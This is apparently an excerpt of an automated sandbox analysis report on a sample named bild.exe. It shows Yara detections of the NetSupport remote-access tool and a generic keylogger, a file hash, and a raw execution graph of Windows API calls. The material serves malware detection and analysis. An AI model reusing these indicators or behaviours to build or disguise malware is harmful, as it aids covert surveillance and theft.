                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:9
                                                                                  Start time:06:41:21
                                                                                  Start date:16/11/2024
                                                                                  Path:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\Public\Public\Videos\Video\bild.exe"
                                                                                  Imagebase:0x2d0000
                                                                                  File size:105'848 bytes
                                                                                  MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1904648910.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000000.1903730466.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:10.4%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:9.8%
                                                                                    Total number of Nodes:1486
                                                                                    Total number of Limit Nodes:34
                                                                                    execution_graph 23877 177216 21 API calls 23878 17ee16 CloseHandle 22067 16d611 22068 16d61d ___scrt_is_nonwritable_in_current_image 22067->22068 22093 16d126 22068->22093 22070 16d624 22072 16d64d 22070->22072 22170 16da75 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 22070->22170 22079 16d68c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 22072->22079 22104 17572c 22072->22104 22076 16d66c ___scrt_is_nonwritable_in_current_image 22077 16d6ec 22112 16db90 22077->22112 22079->22077 22171 174760 38 API calls 3 library calls 22079->22171 22088 16d718 22090 16d721 22088->22090 22172 174b67 28 API calls _abort 22088->22172 22173 16d29d 13 API calls 2 library calls 22090->22173 22094 16d12f 22093->22094 22174 16d8cb IsProcessorFeaturePresent 22094->22174 22096 16d13b 22175 170b66 22096->22175 22098 16d140 22103 16d144 22098->22103 22184 1755b9 22098->22184 22101 16d15b 22101->22070 22103->22070 22106 175743 22104->22106 22105 16d783 _ValidateLocalCookies 5 API calls 22107 16d666 22105->22107 22106->22105 22107->22076 22108 1756d0 22107->22108 22109 1756ff 22108->22109 22110 16d783 _ValidateLocalCookies 5 API calls 22109->22110 22111 175728 22110->22111 22111->22079 22276 16dea0 22112->22276 22115 16d6f2 22116 17567d 22115->22116 22278 178558 22116->22278 22118 16d6fb 22121 16c131 22118->22121 22120 175686 22120->22118 22282 1788e3 38 API calls 22120->22282 22412 15f353 22121->22412 22125 16c150 22461 169036 22125->22461 22127 16c159 22465 160722 GetCPInfo 22127->22465 22129 16c163 ___scrt_get_show_window_mode 22130 16c176 GetCommandLineW 22129->22130 22131 16c185 22130->22131 22132 16c203 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 22130->22132 22468 16a8d4 22131->22468 22133 153f5b _swprintf 51 API calls 22132->22133 22136 16c26c SetEnvironmentVariableW GetModuleHandleW LoadIconW 22133->22136 22481 169a76 LoadBitmapW 22136->22481 22137 16c193 OpenFileMappingW 22141 16c1f3 CloseHandle 22137->22141 22142 16c1ac MapViewOfFile 22137->22142 22138 16c1fd 22475 16be0a 22138->22475 22141->22132 22145 16c1bd __vswprintf_c_l 22142->22145 22146 16c1ea UnmapViewOfFile 22142->22146 22147 16be0a 2 API calls 22145->22147 22146->22141 22149 16c1d9 22147->22149 22148 16c2b3 22150 16c2c5 DialogBoxParamW 22148->22150 22149->22146 22151 16c2ff 22150->22151 22152 16c311 Sleep 22151->22152 22153 16c318 22151->22153 22152->22153 22156 16c326 22153->22156 22506 169237 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 22153->22506 22155 16c345 DeleteObject 22157 16c35f 22155->22157 22158 16c35c DeleteObject 22155->22158 22156->22155 22159 16c390 22157->22159 22163 16c3a2 22157->22163 22158->22157 22507 16be69 WaitForSingleObject PeekMessageW WaitForSingleObject 22159->22507 22162 16c396 CloseHandle 22162->22163 22504 16909e 22163->22504 22164 16c3dc 22165 174a9b GetModuleHandleW 22164->22165 22166 16d70e 22165->22166 22166->22088 22167 174bc4 22166->22167 22676 174941 22167->22676 22170->22070 22171->22077 22172->22090 22173->22076 22174->22096 22176 170b6b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 22175->22176 22188 171c0e 22176->22188 22179 170b79 22179->22098 22181 170b81 22182 170b8c 22181->22182 22202 171c4a DeleteCriticalSection 22181->22202 22182->22098 22230 178ac5 22184->22230 22187 170b8f 8 API calls 3 library calls 22187->22103 22189 171c17 22188->22189 22191 171c40 22189->22191 22192 170b75 22189->22192 22203 171e85 22189->22203 22208 171c4a DeleteCriticalSection 22191->22208 22192->22179 22194 170ca6 22192->22194 22223 171d9a 22194->22223 22196 170cb0 22201 170cbb 22196->22201 22228 171e48 6 API calls try_get_function 22196->22228 22198 170cd6 22198->22181 22199 170cc9 22199->22198 22229 170cd9 6 API calls ___vcrt_FlsFree 22199->22229 22201->22181 22202->22179 22209 171c79 22203->22209 22206 171ebc InitializeCriticalSectionAndSpinCount 22207 171ea8 22206->22207 22207->22189 22208->22192 22210 171cad 22209->22210 22213 171ca9 22209->22213 22210->22206 22210->22207 22211 171ccd 22211->22210 22214 171cd9 GetProcAddress 22211->22214 22213->22210 22213->22211 22216 171d19 22213->22216 22215 171ce9 __crt_fast_encode_pointer 22214->22215 22215->22210 22217 171d36 22216->22217 22218 171d41 LoadLibraryExW 22216->22218 22217->22213 22219 171d5d GetLastError 22218->22219 22221 171d75 22218->22221 22219->22221 22222 171d68 LoadLibraryExW 22219->22222 22220 171d8c FreeLibrary 22220->22217 22221->22217 22221->22220 22222->22221 22224 171c79 try_get_function 5 API calls 22223->22224 22225 171db4 22224->22225 22226 171dcc TlsAlloc 22225->22226 22227 171dbd 22225->22227 22227->22196 22228->22199 22229->22201 22233 178ae2 22230->22233 22234 178ade 22230->22234 22231 16d783 _ValidateLocalCookies 5 API calls 22232 16d14d 22231->22232 22232->22101 22232->22187 22233->22234 22236 1771c0 22233->22236 22234->22231 22237 1771cc ___scrt_is_nonwritable_in_current_image 22236->22237 22248 1776d6 EnterCriticalSection 22237->22248 22239 1771d3 22249 178f93 22239->22249 22241 1771e2 22247 1771f1 22241->22247 22262 177054 29 API calls 22241->22262 22244 1771ec 22263 17710a GetStdHandle GetFileType 22244->22263 22246 177202 ___scrt_is_nonwritable_in_current_image 22246->22233 22264 17720d LeaveCriticalSection _abort 22247->22264 22248->22239 22250 178f9f ___scrt_is_nonwritable_in_current_image 22249->22250 22251 178fc3 22250->22251 22252 178fac 22250->22252 22265 1776d6 EnterCriticalSection 22251->22265 22273 175e3e 20 API calls _abort 22252->22273 22255 178fb1 22274 175d1d 26 API calls _abort 22255->22274 22257 178fbb ___scrt_is_nonwritable_in_current_image 22257->22241 22258 178ffb 22275 179022 LeaveCriticalSection _abort 22258->22275 22261 178fcf 22261->22258 22266 178ee4 22261->22266 22262->22244 22263->22247 22264->22246 22265->22261 22267 175a8d __CreateFrameInfo 20 API calls 22266->22267 22269 178ef6 22267->22269 22268 178f03 22270 1759c2 _free 20 API calls 22268->22270 22269->22268 22271 1779a7 11 API calls 22269->22271 22272 178f55 22270->22272 22271->22269 22272->22261 22273->22255 22274->22257 22275->22257 22277 16dba3 GetStartupInfoW 22276->22277 22277->22115 22279 17856a 22278->22279 22280 178561 22278->22280 22279->22120 22283 178457 22280->22283 22282->22120 22284 17631f _abort 38 API calls 22283->22284 22285 178464 22284->22285 22303 178576 22285->22303 22287 17846c 22312 1781eb 22287->22312 22293 1759c2 _free 20 API calls 22295 178483 22293->22295 22295->22279 22296 1784c1 22336 175e3e 20 API calls _abort 22296->22336 22298 17850a 22302 1784c6 22298->22302 22337 1780c1 26 API calls 22298->22337 22299 1784de 22299->22298 22300 1759c2 _free 20 API calls 22299->22300 22300->22298 22302->22293 22304 178582 ___scrt_is_nonwritable_in_current_image 22303->22304 22305 17631f _abort 38 API calls 22304->22305 22306 17858c 22305->22306 22309 178610 ___scrt_is_nonwritable_in_current_image 22306->22309 22311 1759c2 _free 20 API calls 22306->22311 22338 175a4a 38 API calls _abort 22306->22338 22339 1776d6 EnterCriticalSection 22306->22339 22340 178607 LeaveCriticalSection _abort 22306->22340 22309->22287 22311->22306 22313 172636 __fassign 38 API calls 22312->22313 22314 1781fd 22313->22314 22315 17821e 22314->22315 22316 17820c GetOEMCP 22314->22316 22317 178235 22315->22317 22318 178223 GetACP 22315->22318 22316->22317 22317->22295 22319 1759fc 22317->22319 22318->22317 22320 175a3a 22319->22320 22324 175a0a __CreateFrameInfo 22319->22324 22342 175e3e 20 API calls _abort 22320->22342 22321 175a25 RtlAllocateHeap 22323 175a38 22321->22323 22321->22324 22323->22302 22326 178618 22323->22326 22324->22320 22324->22321 22341 1746ca 7 API calls 2 library calls 22324->22341 22327 1781eb 40 API calls 22326->22327 22328 178637 22327->22328 22330 178688 IsValidCodePage 22328->22330 22333 17863e 22328->22333 22335 1786ad ___scrt_get_show_window_mode 22328->22335 22329 16d783 _ValidateLocalCookies 5 API calls 22331 1784b9 22329->22331 22332 17869a GetCPInfo 22330->22332 22330->22333 22331->22296 22331->22299 22332->22333 22332->22335 22333->22329 22343 1782c3 GetCPInfo 22335->22343 22336->22302 22337->22302 22339->22306 22340->22306 22341->22324 22342->22323 22344 1783a7 22343->22344 22350 1782fd 22343->22350 22347 16d783 _ValidateLocalCookies 5 API calls 22344->22347 22349 178453 22347->22349 22349->22333 22353 1793f3 22350->22353 22352 1775cb __vswprintf_c_l 43 API calls 22352->22344 22354 172636 __fassign 38 API calls 22353->22354 22355 179413 MultiByteToWideChar 22354->22355 22357 1794e9 22355->22357 22358 179451 22355->22358 22359 16d783 _ValidateLocalCookies 5 API calls 22357->22359 22360 179472 __vswprintf_c_l ___scrt_get_show_window_mode 22358->22360 22361 1759fc __vswprintf_c_l 21 API calls 22358->22361 22362 17835e 22359->22362 22363 1794e3 22360->22363 22365 1794b7 MultiByteToWideChar 22360->22365 22361->22360 22367 1775cb 22362->22367 22372 177616 20 API calls _free 22363->22372 22365->22363 22366 1794d3 GetStringTypeW 22365->22366 22366->22363 22368 172636 __fassign 38 API calls 22367->22368 22369 1775de 22368->22369 22373 1773ae 22369->22373 22372->22357 22374 1773c9 __vswprintf_c_l 22373->22374 22375 1773ef MultiByteToWideChar 22374->22375 22376 1775a3 22375->22376 22377 177419 22375->22377 22378 16d783 _ValidateLocalCookies 5 API calls 22376->22378 22382 1759fc __vswprintf_c_l 21 API calls 22377->22382 22384 17743a __vswprintf_c_l 22377->22384 22379 1775b6 22378->22379 22379->22352 22380 177483 MultiByteToWideChar 22381 1774ef 22380->22381 22383 17749c 22380->22383 22409 177616 20 API calls _free 22381->22409 22382->22384 22400 177a09 22383->22400 22384->22380 22384->22381 22388 1774c6 22388->22381 22391 177a09 __vswprintf_c_l 11 API calls 22388->22391 22389 1774fe 22390 1759fc __vswprintf_c_l 21 API calls 22389->22390 22394 17751f __vswprintf_c_l 22389->22394 22390->22394 22391->22381 22392 177594 22408 177616 20 API calls _free 22392->22408 22394->22392 22395 177a09 __vswprintf_c_l 11 API calls 22394->22395 22396 177573 22395->22396 22396->22392 22397 177582 WideCharToMultiByte 22396->22397 22397->22392 22398 1775c2 22397->22398 22410 177616 20 API calls _free 22398->22410 22401 177735 _abort 5 API calls 22400->22401 22402 177a30 22401->22402 22405 177a39 22402->22405 22411 177a91 10 API calls 3 library calls 22402->22411 22404 177a79 LCMapStringW 22404->22405 22406 16d783 _ValidateLocalCookies 5 API calls 22405->22406 22407 1774b3 22406->22407 22407->22381 22407->22388 22407->22389 22408->22381 22409->22376 22410->22381 22411->22404 22508 16cec0 22412->22508 22415 15f377 GetProcAddress 22417 15f3a0 GetProcAddress 22415->22417 22418 15f390 22415->22418 22416 15f3c8 22419 15f6fd GetModuleFileNameW 22416->22419 22519 17462a 42 API calls __vswprintf_c_l 22416->22519 22417->22416 22420 15f3ac 22417->22420 22418->22417 22429 15f718 22419->22429 22420->22416 22422 15f63b 22422->22419 22423 15f646 GetModuleFileNameW CreateFileW 22422->22423 22424 15f675 SetFilePointer 22423->22424 22425 15f6f1 CloseHandle 22423->22425 22424->22425 22426 15f685 ReadFile 22424->22426 22425->22419 22426->22425 22428 15f6a4 22426->22428 22428->22425 22432 15f309 2 API calls 22428->22432 22431 15f74d CompareStringW 22429->22431 22433 15f783 GetFileAttributesW 22429->22433 22434 15f797 22429->22434 22510 15a8e0 22429->22510 22513 15f309 22429->22513 22431->22429 22432->22428 22433->22429 22433->22434 22435 15f7a4 22434->22435 22438 15f7d6 22434->22438 22437 15f7bc GetFileAttributesW 22435->22437 22439 15f7d0 22435->22439 22436 15f8e5 22460 168b8e GetCurrentDirectoryW 22436->22460 22437->22435 22437->22439 22438->22436 22440 15a8e0 GetVersionExW 22438->22440 22439->22438 22441 15f7f0 22440->22441 22442 15f7f7 22441->22442 22443 15f85d 22441->22443 22445 15f309 2 API calls 22442->22445 22444 153f5b _swprintf 51 API calls 22443->22444 22447 15f885 AllocConsole 22444->22447 22446 15f801 22445->22446 22448 15f309 2 API calls 22446->22448 22449 15f892 GetCurrentProcessId AttachConsole 22447->22449 22450 15f8dd ExitProcess 22447->22450 22451 15f80b 22448->22451 22520 1720b3 22449->22520 22454 15d142 54 API calls 22451->22454 22453 15f8b3 GetStdHandle WriteConsoleW Sleep FreeConsole 22453->22450 22455 15f826 22454->22455 22456 153f5b _swprintf 51 API calls 22455->22456 22457 15f839 22456->22457 22458 15d142 54 API calls 22457->22458 22459 15f848 22458->22459 22459->22450 22460->22125 22462 15f309 2 API calls 22461->22462 22463 16904a OleInitialize 22462->22463 22464 16906d GdiplusStartup SHGetMalloc 22463->22464 22464->22127 22466 160746 IsDBCSLeadByte 22465->22466 22466->22466 22467 16075e 22466->22467 22467->22129 22474 16a8de 22468->22474 22469 16a9f4 22469->22137 22469->22138 22470 16a926 CharUpperW 22470->22474 22471 16a9a9 CharUpperW 22471->22474 22473 16a94d CharUpperW 22473->22474 22474->22469 22474->22470 22474->22471 22474->22473 22522 15dfde 73 API calls ___scrt_get_show_window_mode 22474->22522 22476 16cec0 22475->22476 22477 16be17 SetEnvironmentVariableW 22476->22477 22479 16be3a 22477->22479 22478 16be62 22478->22132 22479->22478 22480 16be56 SetEnvironmentVariableW 22479->22480 22480->22478 22482 169a97 22481->22482 22483 169aa0 GetObjectW 22481->22483 22528 168bd0 FindResourceW 22482->22528 22523 168ac0 22483->22523 22488 169af3 22499 15caa7 22488->22499 22489 169ad3 22544 168b22 GetDC GetDeviceCaps ReleaseDC 22489->22544 22490 168bd0 13 API calls 22492 169ac8 22490->22492 22492->22489 22494 169ace DeleteObject 22492->22494 22493 169adb 22545 168adf GetDC GetDeviceCaps ReleaseDC 22493->22545 22494->22489 22496 169ae4 22546 168cf3 8 API calls ___scrt_get_show_window_mode 22496->22546 22498 169aeb DeleteObject 22498->22488 22557 15cacc 22499->22557 22503 15caba 22503->22148 22505 1690c4 GdiplusShutdown CoUninitialize 22504->22505 22505->22164 22506->22156 22507->22162 22509 15f35d GetModuleHandleW 22508->22509 22509->22415 22509->22416 22511 15a8f4 GetVersionExW 22510->22511 22512 15a930 22510->22512 22511->22512 22512->22429 22514 16cec0 22513->22514 22515 15f316 GetSystemDirectoryW 22514->22515 22516 15f34c 22515->22516 22517 15f32e 22515->22517 22516->22429 22518 15f33f LoadLibraryW 22517->22518 22518->22516 22519->22422 22521 1720bb 22520->22521 22521->22453 22521->22521 22522->22474 22547 168adf GetDC GetDeviceCaps ReleaseDC 22523->22547 22525 168ac7 22526 168ad3 22525->22526 22548 168b22 GetDC GetDeviceCaps ReleaseDC 22525->22548 22526->22488 22526->22489 22526->22490 22529 168c23 22528->22529 22530 168bf1 SizeofResource 22528->22530 22529->22483 22530->22529 22531 168c05 LoadResource 22530->22531 22531->22529 22532 168c16 LockResource 22531->22532 22532->22529 22533 168c2a GlobalAlloc 22532->22533 22533->22529 22534 168c41 GlobalLock 22533->22534 22535 168c4c __vswprintf_c_l 22534->22535 22536 168cb8 GlobalFree 22534->22536 22537 168c54 CreateStreamOnHGlobal 22535->22537 22536->22529 22538 168cb1 GlobalUnlock 22537->22538 22539 168c6c 22537->22539 22538->22536 22549 168b65 GdipAlloc 22539->22549 22542 168c90 GdipCreateHBITMAPFromBitmap 22543 168ca6 22542->22543 22543->22538 22544->22493 22545->22496 22546->22498 22547->22525 22548->22526 22550 168b77 22549->22550 22552 168b84 22549->22552 22553 168924 22550->22553 22552->22538 22552->22542 22552->22543 22554 168945 GdipCreateBitmapFromStreamICM 22553->22554 22555 16894c GdipCreateBitmapFromStream 22553->22555 22556 168951 22554->22556 22555->22556 22556->22552 22558 15cad6 _wcschr __EH_prolog 22557->22558 22559 15cb02 GetModuleFileNameW 22558->22559 22560 15cb33 22558->22560 22561 15cb1c 22559->22561 22580 15973d 22560->22580 22561->22560 22565 1599e0 70 API calls 22569 15ccb9 new 22565->22569 22568 15cb63 22573 15cc9f 22568->22573 22575 15cce9 22568->22575 22589 159aeb 22568->22589 22604 15990d 22568->22604 22612 1599e0 22568->22612 22570 15990d 73 API calls 22569->22570 22569->22575 22572 15ccdf new 22570->22572 22572->22575 22617 1606e9 MultiByteToWideChar 22572->22617 22573->22565 22573->22575 22597 159437 22575->22597 22576 15ce48 GetModuleHandleW FindResourceW 22577 15ce76 22576->22577 22579 15ce70 22576->22579 22578 15c91f 52 API calls 22577->22578 22578->22579 22579->22503 22581 159747 22580->22581 22582 15979d CreateFileW 22581->22582 22583 15981b 22582->22583 22584 1597ca GetLastError 22582->22584 22583->22568 22618 15b275 22584->22618 22586 1597ea 22586->22583 22587 1597ee CreateFileW GetLastError 22586->22587 22588 159812 22587->22588 22588->22583 22590 159b0f SetFilePointer 22589->22590 22591 159afe 22589->22591 22592 159b2d GetLastError 22590->22592 22593 159b48 22590->22593 22591->22593 22631 156eae 68 API calls 22591->22631 22592->22593 22595 159b37 22592->22595 22593->22568 22595->22593 22632 156eae 68 API calls 22595->22632 22598 15946c 22597->22598 22599 15945b 22597->22599 22598->22576 22599->22598 22600 159467 22599->22600 22601 15946e 22599->22601 22633 1595ea 22600->22633 22638 1594a3 22601->22638 22607 159924 22604->22607 22606 159985 22606->22568 22607->22606 22608 159977 22607->22608 22610 159987 22607->22610 22653 159613 22607->22653 22665 156e74 68 API calls 22608->22665 22610->22606 22611 159613 5 API calls 22610->22611 22611->22610 22670 159897 22612->22670 22615 159a0b 22615->22568 22617->22575 22619 15b282 22618->22619 22627 15b28c 22619->22627 22628 15b40f CharUpperW 22619->22628 22621 15b29b 22629 15b43b CharUpperW 22621->22629 22623 15b2aa 22624 15b325 GetCurrentDirectoryW 22623->22624 22625 15b2ae 22623->22625 22624->22627 22630 15b40f CharUpperW 22625->22630 22627->22586 22628->22621 22629->22623 22630->22627 22631->22590 22632->22593 22634 1595f7 22633->22634 22635 1595f3 22633->22635 22634->22635 22644 159dac 22634->22644 22635->22598 22639 1594cd 22638->22639 22640 1594af 22638->22640 22641 1594ec 22639->22641 22652 156d80 67 API calls 22639->22652 22640->22639 22642 1594bb CloseHandle 22640->22642 22641->22598 22642->22639 22645 16cec0 22644->22645 22646 159db9 DeleteFileW 22645->22646 22647 159611 22646->22647 22648 159dcc 22646->22648 22647->22598 22649 15b275 2 API calls 22648->22649 22650 159de0 22649->22650 22650->22647 22651 159de4 DeleteFileW 22650->22651 22651->22647 22652->22641 22654 159621 GetStdHandle 22653->22654 22655 15962c ReadFile 22653->22655 22654->22655 22656 159645 22655->22656 22657 159665 22655->22657 22666 15971a 22656->22666 22657->22607 22659 15964c 22660 15965a 22659->22660 22661 15966d GetLastError 22659->22661 22662 15967c 22659->22662 22663 159613 GetFileType 22660->22663 22661->22657 22661->22662 22662->22657 22664 15968c GetLastError 22662->22664 22663->22657 22664->22657 22664->22660 22665->22606 22667 159720 22666->22667 22668 159723 GetFileType 22666->22668 22667->22659 22669 159731 22668->22669 22669->22659 22671 159902 22670->22671 22672 1598a3 22670->22672 22671->22615 22675 156eae 68 API calls 22671->22675 22673 1598da SetFilePointer 22672->22673 22673->22671 22674 1598f8 GetLastError 22673->22674 22674->22671 22675->22615 22677 17494d _abort 22676->22677 22678 174965 22677->22678 22679 174a9b _abort GetModuleHandleW 22677->22679 22698 1776d6 EnterCriticalSection 22678->22698 22681 174959 22679->22681 22681->22678 22710 174adf GetModuleHandleExW 22681->22710 22684 17496d 22694 1749e2 22684->22694 22697 174a0b 22684->22697 22718 175447 20 API calls _abort 22684->22718 22686 174a54 22719 17f149 5 API calls _ValidateLocalCookies 22686->22719 22687 174a28 22702 174a5a 22687->22702 22691 1756d0 _abort 5 API calls 22696 1749fa 22691->22696 22692 1756d0 _abort 5 API calls 22692->22697 22694->22691 22694->22696 22696->22692 22699 174a4b 22697->22699 22698->22684 22720 17771e LeaveCriticalSection 22699->22720 22701 174a24 22701->22686 22701->22687 22721 177b13 22702->22721 22705 174a88 22708 174adf _abort 8 API calls 22705->22708 22706 174a68 GetPEB 22706->22705 22707 174a78 GetCurrentProcess TerminateProcess 22706->22707 22707->22705 22709 174a90 ExitProcess 22708->22709 22711 174b2c 22710->22711 22712 174b09 GetProcAddress 22710->22712 22714 174b32 FreeLibrary 22711->22714 22715 174b3b 22711->22715 22713 174b1e 22712->22713 22713->22711 22714->22715 22716 16d783 _ValidateLocalCookies 5 API calls 22715->22716 22717 174b45 22716->22717 22717->22678 22718->22694 22720->22701 22722 177b38 22721->22722 22724 177b2e 22721->22724 22723 177735 _abort 5 API calls 22722->22723 22723->22724 22725 16d783 _ValidateLocalCookies 5 API calls 22724->22725 22726 174a64 22725->22726 22726->22705 22726->22706 23805 151019 29 API calls pre_c_initialization 23809 16d002 38 API calls 2 library calls 23911 176f03 21 API calls 2 library calls 23857 173501 QueryPerformanceFrequency QueryPerformanceCounter 23912 17c301 21 API calls __vswprintf_c_l 23881 170a00 6 API calls 4 library calls 23913 16d736 20 API calls 23858 16a537 93 API calls _swprintf 23859 175536 8 API calls ___vcrt_uninitialize 23815 17f830 DeleteCriticalSection 23861 160d3a 26 API calls std::bad_exception::bad_exception 23772 16c726 19 API calls ___delayLoadHelper2@8 23862 169123 73 API calls 23817 16b820 72 API calls 23788 176428 23796 17784c 23788->23796 23791 17643c 23793 176444 23794 176451 23793->23794 23804 176454 11 API calls 23793->23804 23797 177735 _abort 5 API calls 23796->23797 23798 177873 23797->23798 23799 17788b TlsAlloc 23798->23799 23800 17787c 23798->23800 23799->23800 23801 16d783 _ValidateLocalCookies 5 API calls 23800->23801 23802 176432 23801->23802 23802->23791 23803 1763a3 20 API calls 3 library calls 23802->23803 23803->23793 23804->23791 23863 16d553 46 API calls 6 library calls 23864 16995f 104 API calls 23865 16955f 71 API calls 22728 16cd5c 22729 16cd66 22728->22729 22732 16cabc 22729->22732 22760 16c7ca 22732->22760 22734 16cad6 22735 16cb33 22734->22735 22749 16cb57 22734->22749 22771 16ca3a 11 API calls 3 library calls 22735->22771 22737 16cb3e RaiseException 22738 16cd2c 22737->22738 22740 16d783 _ValidateLocalCookies 5 API calls 22738->22740 22739 16cbcf LoadLibraryExA 22741 16cbe2 GetLastError 22739->22741 22742 16cc30 22739->22742 22743 16cd3b 22740->22743 22745 16cbf5 22741->22745 22746 16cc0b 22741->22746 22744 16cc3b FreeLibrary 22742->22744 22747 16cc42 22742->22747 22744->22747 22745->22742 22745->22746 22772 16ca3a 11 API calls 3 library calls 22746->22772 22748 16cca0 GetProcAddress 22747->22748 22755 16ccfe 22747->22755 22750 16ccb0 GetLastError 22748->22750 22748->22755 22749->22739 22749->22742 22749->22747 22749->22755 22752 16ccc3 22750->22752 22752->22755 22773 16ca3a 11 API calls 3 library calls 22752->22773 22754 16cc16 RaiseException 22754->22738 22774 16ca3a 11 API calls 3 library calls 22755->22774 22757 16cce4 RaiseException 22758 16c7ca ___delayLoadHelper2@8 11 API calls 22757->22758 22759 16ccfb 22758->22759 22759->22755 22761 16c7d6 22760->22761 22762 16c7fc 22760->22762 22775 16c878 8 API calls 2 library calls 22761->22775 22762->22734 22764 16c7db 22765 16c7f7 22764->22765 22776 16c9ca VirtualQuery GetSystemInfo VirtualProtect DloadObtainSection DloadMakePermanentImageCommit 22764->22776 22777 16c7fd GetModuleHandleW GetProcAddress GetProcAddress 22765->22777 22768 16d783 _ValidateLocalCookies 5 API calls 22769 16cab8 22768->22769 22769->22734 22770 16ca87 22770->22768 22771->22737 22772->22754 22773->22757 22774->22738 22775->22764 22776->22765 22777->22770 23822 15605e 73 API calls 23914 177ede 27 API calls _ValidateLocalCookies 23823 170058 RaiseException 23890 169646 92 API calls 23915 171b40 5 API calls 2 library calls 22788 169b4f 22789 169b59 __EH_prolog 22788->22789 22948 1512e7 22789->22948 22792 16a230 23021 16b8bc 22792->23021 22793 169b9b 22795 169c11 22793->22795 22796 169ba8 22793->22796 22853 169b87 22793->22853 22798 169cb0 GetDlgItemTextW 22795->22798 22804 169c2b 22795->22804 22805 169bad 22796->22805 22926 169be4 22796->22926 22801 169ce7 22798->22801 22798->22926 22799 16a24e SendMessageW 22800 16a25c 22799->22800 22802 16a276 GetDlgItem SendMessageW 22800->22802 22803 16a265 SendDlgItemMessageW 22800->22803 22808 169cf0 22801->22808 22809 169cff GetDlgItem 22801->22809 23039 168b8e GetCurrentDirectoryW 22802->23039 22803->22802 22810 15d142 54 API calls 22804->22810 22811 15d142 54 API calls 22805->22811 22805->22853 22806 169c05 KiUserCallbackDispatcher 22806->22853 22822 16a1d0 22808->22822 22808->22926 22813 169d13 SendMessageW SendMessageW 22809->22813 22814 169d39 SetFocus 22809->22814 22815 169c4d SetDlgItemTextW 22810->22815 22816 169bc7 22811->22816 22812 16a2a8 GetDlgItem 22817 16a2c7 SetWindowTextW 22812->22817 22818 16a2c1 22812->22818 22813->22814 22820 169d49 22814->22820 22833 169d55 22814->22833 22819 169c5b 22815->22819 23061 151227 SHGetMalloc 22816->23061 23040 168fc8 GetClassNameW 22817->23040 22818->22817 22828 169c68 GetMessageW 22819->22828 22841 169c8e TranslateMessage DispatchMessageW 22819->22841 22819->22853 22824 15d142 54 API calls 22820->22824 22826 15d142 54 API calls 22822->22826 22829 169d53 22824->22829 22825 169bce 22830 169bd2 SetDlgItemTextW 22825->22830 22825->22853 22831 16a1e0 SetDlgItemTextW 22826->22831 22828->22819 22828->22853 22958 16b70e GetDlgItem 22829->22958 22830->22853 22834 16a1f4 22831->22834 22837 15d142 54 API calls 22833->22837 22840 15d142 54 API calls 22834->22840 22839 169d87 22837->22839 22838 169daa 22966 159cce 22838->22966 22844 153f5b _swprintf 51 API calls 22839->22844 22845 16a21d 22840->22845 22841->22819 22842 16a312 22843 16a342 22842->22843 22848 15d142 54 API calls 22842->22848 22852 16aa45 91 API calls 22843->22852 22896 16a3fa 22843->22896 22844->22829 22849 15d142 54 API calls 22845->22849 22847 16aa45 91 API calls 22847->22842 22851 16a325 SetDlgItemTextW 22848->22851 22849->22853 22858 15d142 54 API calls 22851->22858 22859 16a35d 22852->22859 22854 16a4aa 22860 16a4b3 EnableWindow 22854->22860 22861 16a4bc 22854->22861 22855 169de6 22972 169023 SetCurrentDirectoryW 22855->22972 22856 169ddf GetLastError 22856->22855 22863 16a339 SetDlgItemTextW 22858->22863 22870 16a36f 22859->22870 22884 16a394 22859->22884 22860->22861 22864 16a4d9 22861->22864 23070 1512a4 GetDlgItem EnableWindow 22861->23070 22862 169dfc 22867 169e0f 22862->22867 22868 169e05 GetLastError 22862->22868 22863->22843 22869 16a500 22864->22869 22876 16a4f8 SendMessageW 22864->22876 22865 16a3ed 22872 16aa45 91 API calls 22865->22872 22875 169e8a 22867->22875 22880 169e9a 22867->22880 22881 169e27 GetTickCount 22867->22881 22868->22867 22869->22853 22877 15d142 54 API calls 22869->22877 23068 16859c 6 API calls 22870->23068 22871 16a4cf 23071 1512a4 GetDlgItem EnableWindow 22871->23071 22872->22896 22879 16a0d3 22875->22879 22875->22880 22876->22869 22883 16a519 SetDlgItemTextW 22877->22883 22878 16a388 22878->22884 22981 1512c2 GetDlgItem ShowWindow 22879->22981 22886 169eb2 GetModuleFileNameW 22880->22886 22887 16a06e 22880->22887 22888 153f5b _swprintf 51 API calls 22881->22888 22882 16a488 23069 16859c 6 API calls 22882->23069 22883->22853 22884->22865 22891 16aa45 91 API calls 22884->22891 23062 15de7c 73 API calls 22886->23062 22900 15d142 54 API calls 22887->22900 22887->22926 22894 169e44 22888->22894 22890 15d142 54 API calls 22890->22896 22897 16a3c2 22891->22897 